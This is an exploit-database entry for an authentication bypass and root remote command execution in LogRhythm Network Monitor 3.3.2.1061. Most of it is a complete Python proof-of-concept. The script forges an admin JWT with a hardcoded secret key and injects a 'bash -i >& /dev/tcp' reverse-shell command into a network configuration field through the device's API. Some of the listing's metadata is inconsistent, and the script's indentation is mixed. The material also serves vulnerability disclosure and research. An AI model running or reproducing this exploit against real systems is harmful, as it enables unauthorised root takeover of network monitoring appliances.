LogRhythm Network Monitor Auth Bypass Root RCE

vendor:

Network Monitor

by:

Francesco Oddo

8,8

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: Network Monitor

Affected Version From: 3.3.2.1061 or below

Affected Version To: 3.3.2.1061 or below

Patch Exists: YES

Related CWE: N/A

CPE: a:logrhythm:network_monitor

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2017

LogRhythm Network Monitor Auth Bypass Root RCE

LogRhythm Network Monitor is vulnerable to an authentication bypass vulnerability. An attacker can exploit this vulnerability to gain root access to the system. The vulnerability is due to the lack of authentication checks when making certain API calls. An attacker can craft a JWT token with an arbitrary username and role and use it to make API calls. This can be used to bypass authentication and gain root access to the system.

Mitigation:

Upgrade to the latest version of LogRhythm Network Monitor.

Source

Exploit-DB raw data:

# Exploit Title: LogRhythm Network Monitor Auth Bypass Root RCE
# Public Disclosure Date: 24 Apr 2017
# Author: Francesco Oddo
# Reference: http://security-assessment.com/files/documents/advisory/Logrhythm-NetMonitor-Advisory.pdf
# Software Link: https://logrhythm.com/network-monitor-freemium/
# Version: 3.3.2.1061 (latest) or below 
# Tested On: nm_install_3.3.2.1061.iso with Freemium License (SHA256 7978f84e9fb18e2fae95f77a263801ca89b4767c95154b9ea874032081b02ce1)
# Dependencies: `pip install PyJWT`

import json
import requests
import argparse
import time 
import jwt

def forge_jwt(rhost):
	print "[+] Forging JWT authentication token"
	key = 'Gluten-free 100% narwhal deserunt polaroid; quinoa keytar asymmetrical slow-carb plaid occaecat nostrud green juice dolor!'

	iat = time.time()
	exp = iat + 3600;

	body = json.loads('{"iat":1479893930,"exp":1479894830,"data":{"username":"admin","licensed":true,"role":"admin","timeToResetPass":false}}')
	body["iat"] = int(iat)
	body["exp"] = int(exp)

	token = jwt.encode(body, key, algorithm='HS512');
	return token

def command_inject(rhost, lhost, lport, gwhost, ifname):
	uri = "https://%s/data/api/configuration/" % rhost
	json_body = json.loads('{"type":"network","configurations":[{"name":"interface","value":"","isToggle":false},{"name":"method","value":true,"isToggle":true},{"name":"ipAddress","value":"","isToggle":false},{"name":"netMask","value":"255.255.255.0","isToggle":false},{"name":"gateway","value":"","isToggle":false},{"name":"dnsServers","value":"","isToggle":false},{"name":"searchDomains","value":"","isToggle":false}],"diffFields":["dnsServers"]}')
	payload = ";bash -i >& /dev/tcp/%s/%s 0>&1" % (lhost, lport)
        json_body["configurations"][0]["value"] = ifname
	json_body["configurations"][2]["value"] = rhost
	json_body["configurations"][3]["value"] = payload
	json_body["configurations"][4]["value"] = gwhost
	json_body["configurations"][5]["value"] = gwhost
	jwt = forge_jwt(rhost)
	auth_header = {'Token': jwt}
	print "[+] Initiating reverse shell via command injection at %s:%s" % (lhost, lport)
	requests.post(url=uri, json=json_body, headers=auth_header, verify=False)

if __name__ == '__main__':
	parser = argparse.ArgumentParser(description='LogRhythm Network Monitor Root Remote Command Execution PoC')
	parser.add_argument('--rhost', help='RHOST IP address')
	parser.add_argument('--lhost', help='LHOST IP address')
	parser.add_argument('--lport', help='LPORT')
	parser.add_argument('--gwhost', help='Gateway IP address')
    parser.add_argument('--ifname', help='Target Interface Identifier', default='enp0s3')
	args = parser.parse_args()

	command_inject(args.rhost, args.lhost, args.lport, args.gwhost, args.ifname)